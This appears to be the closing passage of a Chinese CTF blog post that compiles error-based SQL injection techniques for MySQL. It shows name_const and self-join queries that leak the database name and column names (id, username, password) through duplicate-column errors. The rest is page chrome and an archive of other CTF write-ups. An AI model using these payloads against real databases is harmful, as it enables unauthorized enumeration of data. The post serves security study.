<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> name_const((<span class="keyword">SELECT</span> database()), <span class="number">1</span>),</span><br><span class="line">       name_const((<span class="keyword">SELECT</span> database()), <span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<h2 id="join"><a href="#join" class="headerlink" title="join()"></a><font style="color:#000000;">join()</font></h2><blockquote>
<p><font style="color:#000000;">join具有 </font><strong><font style="color:#000000;">连接</font></strong><font style="color:#000000;">的作用，即当两个或者两个以上的表有关系时，需要用join来连接这些相关的表，来处理或分析数据：</font></p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44177568/article/details/103038236">MySQL中的join以及on条件的用法_join on-CSDN博客</a></p>
<p><font style="color:#000000;">mysql 不允许有两个相同的列名，所以会报错。</font></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mysql<span class="operator">&gt;</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span>(<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users a <span class="keyword">join</span> users b)c;</span><br><span class="line">ERROR <span class="number">1060</span> (<span class="number">42</span>S21): Duplicate <span class="keyword">column</span> name <span class="string">&#x27;id&#x27;</span></span><br><span class="line">mysql<span class="operator">&gt;</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span>(<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users a <span class="keyword">join</span> users b <span class="keyword">using</span>(id))c;</span><br><span class="line">ERROR <span class="number">1060</span> (<span class="number">42</span>S21): Duplicate <span class="keyword">column</span> name <span class="string">&#x27;username&#x27;</span></span><br><span class="line">mysql<span class="operator">&gt;</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span>(<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> <span class="keyword">user</span> a <span class="keyword">join</span> users b <span class="keyword">using</span>(id, username))c;</span><br><span class="line">ERROR <span class="number">1060</span> (<span class="number">42</span>S21): Duplicate <span class="keyword">column</span> name <span class="string">&#x27;password&#x27;</span></span><br></pre></td></tr></table></figure>


    </article>
    <!-- license -->
        <div class="license-wrapper">
            <p>Author：<a href="http://example.com">温柔刀</a>
            <p>Link：<a href="http://example.com/2025/07/28/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%95%B4%E7%90%86/">http://example.com/2025/07/28/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%95%B4%E7%90%86/</a>
            <p>Publish date：<a href="http://example.com/2025/07/28/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%95%B4%E7%90%86/">July 28th 2025, 9:28:08 pm</a>
            <p>Update date：<a href="http://example.com/2025/07/28/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%95%B4%E7%90%86/">August 16th 2025, 2:38:20 pm</a>
            <p>License：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
                <div class="nextSlogan">Next Post</div>
                <a href="/2025/08/05/BaseCTF-Web%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/" title="BaseCTF-Web部分题解">
                    <div class="nextTitle">BaseCTF-Web部分题解</div>
                </a>
        </li>
        <li class="previous">
                <div class="prevSlogan">Previous Post</div>
                <a href="/2025/07/28/Perl-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E2%80%94%E2%80%94-CSAWQual-2016-I-Got-ID/" title="Perl 文件上传—— [CSAWQual 2016]I_Got_ID">
                    <div class="prevTitle">Perl 文件上传—— [CSAWQual 2016]I_Got_ID</div>
                </a>
        </li>
    </ul>
    <!-- comment -->
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->

            
            
            
            <!-- utteranc评论 -->

            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->

            
            
            
        </div>
    <!-- timeliness note -->
    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
        <script>
            (function () {
                const time = document.getElementsByClassName('post-intro-time')[0]
                const post = document.getElementsByTagName("article")[0]
                if (time === undefined || post === undefined) {
                    return
                }

                const pubTime = new Date(time.innerText)
                const now = Date.now()
                const interval = parseInt(now - pubTime)
                const days = parseInt(interval / 86400000)
                const outdated_threshold = parseInt(180)
                if (interval > outdated_threshold * 24 * 3600 * 1000) {
                    post.innerHTML = '<div class="note note-warning">' +
                    `<div class="title">文章时效性提示</div><p>这是一篇发布于 ${days} 天前的文章，部分信息可能已发生改变，请注意甄别。` +
                    '</p></div>' + post.innerHTML;
                }
            })();
        </script>
    <!-- Mathjax -->
</main>

                <!-- profile -->
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
        <div class="social">
                            <a href="mailto:12345@qq.com" class="iconfont-archer email" title="email" ></a>
                <a href="//github.com/fi3ework" class="iconfont-archer github" target="_blank" title="github"></a>
                <span class="iconfont-archer wechat" title="wechat">
                    <img class="profile-qr" src="/assets/example_qr.png" />
                </span>

        </div>
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    <!-- 不蒜子  -->
        <div class="busuanzi-container">
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
        </div>
</footer>

        </div>
        <!-- toc -->
            <div class="toc-wrapper toc-wrapper-loding" style=    top:50vh;
>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%BB%E9%94%AE%E9%87%8D%E5%A4%8D%E6%8A%A5%E9%94%99"><span class="toc-number">1.</span> <span class="toc-text">主键重复报错</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xpath%E8%AF%AD%E6%B3%95%E9%94%99%E8%AF%AF%E6%8A%A5%E9%94%99%EF%BC%88-mysql5-1-5"><span class="toc-number">2.</span> <span class="toc-text">xpath语法错误报错（&gt;mysql5.1.5)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#updatexml-%E6%8A%A5%E9%94%99"><span class="toc-number">2.1.</span> <span class="toc-text">updatexml()报错</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#extractvalue-%E6%8A%A5%E9%94%99"><span class="toc-number">2.2.</span> <span class="toc-text">extractvalue()报错</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E6%BA%A2%E5%87%BA%E6%8A%A5%E9%94%99"><span class="toc-number">3.</span> <span class="toc-text">数据溢出报错</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8C%E7%B2%BE%E5%BA%A6%E6%BA%A2%E5%87%BA%E6%8A%A5%E9%94%99"><span class="toc-number">3.1.</span> <span class="toc-text">双精度溢出报错</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%95%B4%E5%9E%8B%E6%BA%A2%E5%87%BA%E6%8A%A5%E9%94%99"><span class="toc-number">4.</span> <span class="toc-text">整型溢出报错</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%87%A0%E4%BD%95%E5%87%BD%E6%95%B0%E6%8A%A5%E9%94%99-5-7-17-5-5-48"><span class="toc-number">5.</span> <span class="toc-text">几何函数报错(5.7.17-5.5.48)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%88%97%E5%90%8D%E9%87%8D%E5%A4%8D%E6%8A%A5%E9%94%99%EF%BC%88Mysql-5-0-12-5-0-51%EF%BC%89"><span class="toc-number">6.</span> <span class="toc-text">列名重复报错（Mysql 5.0.12-5.0.51）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#name-const"><span class="toc-number">6.1.</span> <span class="toc-text">name_const()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#join"><span class="toc-number">6.2.</span> <span class="toc-text">join()</span></a></li></ol></li></ol>
            </div>
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    <div class="total-and-search">
        <div class="total-archive">
        Total : 23
        </div>
        <!-- search  -->
    </div>
    <div class="post-archive">
            <div class="archive-year"> 2025 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">08/31</span>
            <a class="archive-post-title" href="/2025/08/31/LilCTF%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/">LilCTF 部分wp</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/20</span>
            <a class="archive-post-title" href="/2025/08/20/bottle%E6%A1%86%E6%9E%B6%E7%9B%B8%E5%85%B3%E9%A2%98%E7%9B%AE/">bottle框架相关题目（待更）</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span>
            <a class="archive-post-title" href="/2025/08/17/%E5%A5%87%E5%A6%99%E7%9A%84json_decode/">奇妙的json_decode</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">08/05</span>
            <a class="archive-post-title" href="/2025/08/05/BaseCTF-Web%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/">BaseCTF-Web部分题解</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/28</span>
            <a class="archive-post-title" href="/2025/07/28/Perl-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E2%80%94%E2%80%94-CSAWQual-2016-I-Got-ID/">Perl 文件上传—— [CSAWQual 2016]I_Got_ID</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/28</span>
            <a class="archive-post-title" href="/2025/07/28/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%95%B4%E7%90%86/">SQL报错注入整理</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/28</span>
            <a class="archive-post-title" href="/2025/07/28/Java%E5%8F%8D%E5%B0%84%E5%92%8CCC%E9%93%BE/">Java反射和CC链</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/26</span>
            <a class="archive-post-title" href="/2025/07/26/Exception-Error-%E7%B1%BB%E7%BB%95%E8%BF%87md5%E3%80%81sha1%E2%80%94%E2%80%94-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2020-greatphp/">Exception,Error 类绕过md5、sha1—— [极客大挑战 2020]greatphp</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/21</span>
            <a class="archive-post-title" href="/2025/07/21/SSTI/">SSTI</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/18</span>
            <a class="archive-post-title" href="/2025/07/18/L3NCTF-Web%E9%A2%98%E7%9B%AE%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/">L3NCTF-Web题目部分复现</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/18</span>
            <a class="archive-post-title" href="/2025/07/18/sqlmap%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%B0%8F%E8%AE%B0/">sqlmap源码阅读小记</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/18</span>
            <a class="archive-post-title" href="/2025/07/18/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%98%E7%9B%AE%E5%90%88%E9%9B%86/">反序列化题目合集</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/16</span>
            <a class="archive-post-title" href="/2025/07/16/Tomcat-JSP-servlet-war%E2%80%94%E2%80%94-WUSTCTF-2020-train-yourself-to-be-godly/">Tomcat,JSP,servlet,war——[WUSTCTF 2020]train yourself to be godly</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/15</span>
            <a class="archive-post-title" href="/2025/07/15/JAVA%E5%89%8D%E7%BD%AE%E6%A6%82%E5%BF%B5%E5%B0%8F%E8%AE%B0/">JAVA前置概念小记</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/13</span>
            <a class="archive-post-title" href="/2025/07/13/%E5%B0%8F%E5%88%BB%E4%B9%9F%E8%83%BD%E8%AF%BB%E6%87%82%E7%9A%84%E4%BD%86%E5%BE%85%E6%9B%B4%E2%80%94%E2%80%94-NCTF-2023-EvilMQ/">小刻也能读懂的但待更——[NCTF 2023]EvilMQ</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/09</span>
            <a class="archive-post-title" href="/2025/07/09/session-%E4%B8%8E%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E2%80%94%E2%80%94-HNCTF-2022-QAQ-1inclu4e/">session 与条件竞争——[HNCTF 2022]QAQ_1inclu4e</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/08</span>
            <a class="archive-post-title" href="/2025/07/08/SOME-%E6%94%BB%E5%87%BB%E2%80%94%E2%80%94-HCTF-2017-Deserted-place/">SOME 攻击—— [HCTF 2017]Deserted place</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">07/08</span>
            <a class="archive-post-title" href="/2025/07/08/PHP-%E5%B8%B8%E8%A7%81%E6%97%A0%E5%8F%82%E5%87%BD%E6%95%B0%E2%80%94%E2%80%94-HNCTF-2022-WEEK2-Canyource/">PHP 常见无参函数—— [HNCTF 2022 WEEK2]Canyource </a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">05/26</span>
            <a class="archive-post-title" href="/2025/05/26/LitCTF-Web%E6%96%B9%E5%90%91%E9%A2%98%E8%A7%A3/">LitCTF-Web方向题解</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/30</span>
            <a class="archive-post-title" href="/2025/04/30/%E5%82%BB%E5%AD%90%E9%83%BD%E8%83%BD%E7%9C%8B%E6%87%82%E7%9A%84SSTI%E5%85%A5%E9%97%A8/">傻子都能看懂的SSTI入门</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">04/29</span>
            <a class="archive-post-title" href="/2025/04/29/%E7%BA%A2%E9%98%9F%E7%AC%94%E8%AE%B0/">红队笔记</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">03/26</span>
            <a class="archive-post-title" href="/2025/03/26/CTFSHOW%E5%88%B7%E9%A2%98%E6%B1%87%E6%80%BB/">CTFSHOW 刷题汇总</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">02/26</span>
            <a class="archive-post-title" href="/2025/02/26/%E8%87%AA%E5%8A%A8%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%80%9A%E6%8A%A5/">自动化漏洞通报</a>
        </li>
            </ul>
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
            <span class="sidebar-tag-name" data-tags="Java">
                <span class="iconfont-archer">&#xe606;</span>
                Java
            </span>
            <span class="sidebar-tag-name" data-tags="wp">
                <span class="iconfont-archer">&#xe606;</span>
                wp
            </span>
            <span class="sidebar-tag-name" data-tags="PHP原生类">
                <span class="iconfont-archer">&#xe606;</span>
                PHP原生类
            </span>
            <span class="sidebar-tag-name" data-tags="Nginx">
                <span class="iconfont-archer">&#xe606;</span>
                Nginx
            </span>
            <span class="sidebar-tag-name" data-tags="Perl">
                <span class="iconfont-archer">&#xe606;</span>
                Perl
            </span>
            <span class="sidebar-tag-name" data-tags="CGI">
                <span class="iconfont-archer">&#xe606;</span>
                CGI
            </span>
            <span class="sidebar-tag-name" data-tags="文件上传">
                <span class="iconfont-archer">&#xe606;</span>
                文件上传
            </span>
            <span class="sidebar-tag-name" data-tags="RCE">
                <span class="iconfont-archer">&#xe606;</span>
                RCE
            </span>
            <span class="sidebar-tag-name" data-tags="WAF绕过">
                <span class="iconfont-archer">&#xe606;</span>
                WAF绕过
            </span>
            <span class="sidebar-tag-name" data-tags="PHP">
                <span class="iconfont-archer">&#xe606;</span>
                PHP
            </span>
            <span class="sidebar-tag-name" data-tags="无参">
                <span class="iconfont-archer">&#xe606;</span>
                无参
            </span>
            <span class="sidebar-tag-name" data-tags="SOME">
                <span class="iconfont-archer">&#xe606;</span>
                SOME
            </span>
            <span class="sidebar-tag-name" data-tags="Tomcat">
                <span class="iconfont-archer">&#xe606;</span>
                Tomcat
            </span>
            <span class="sidebar-tag-name" data-tags="报错注入">
                <span class="iconfont-archer">&#xe606;</span>
                报错注入
            </span>
            <span class="sidebar-tag-name" data-tags="session">
                <span class="iconfont-archer">&#xe606;</span>
                session
            </span>
            <span class="sidebar-tag-name" data-tags="条件竞争">
                <span class="iconfont-archer">&#xe606;</span>
                条件竞争
            </span>
            <span class="sidebar-tag-name" data-tags="bottle">
                <span class="iconfont-archer">&#xe606;</span>
                bottle
            </span>
            <span class="sidebar-tag-name" data-tags="SSTI">
                <span class="iconfont-archer">&#xe606;</span>
                SSTI
            </span>
            <span class="sidebar-tag-name" data-tags="pickle反序列化">
                <span class="iconfont-archer">&#xe606;</span>
                pickle反序列化
            </span>
            <span class="sidebar-tag-name" data-tags="上传压缩包">
                <span class="iconfont-archer">&#xe606;</span>
                上传压缩包
            </span>
            <span class="sidebar-tag-name" data-tags="json">
                <span class="iconfont-archer">&#xe606;</span>
                json
            </span>
            <span class="sidebar-tag-name" data-tags="笔记">
                <span class="iconfont-archer">&#xe606;</span>
                笔记
            </span>
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMetaRoot = "/"
    if (siteMetaRoot === "undefined") {
        siteMetaRoot = '/'
    }
    var siteMeta = {
        url: "http://example.com",
        root: siteMetaRoot,
        author: "温柔刀"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->

        <!-- main func -->
        <script src="/scripts/main.js"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.36/dist/fancybox/fancybox.umd.js" onload="window.Fancybox.bind('[data-fancybox]')" defer></script>
        <!-- algolia -->
        <!-- busuanzi -->
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        <!-- async load share.js -->
            <script src="/scripts/share.js" async></script>
        <!-- mermaid -->
    </body>
</html>
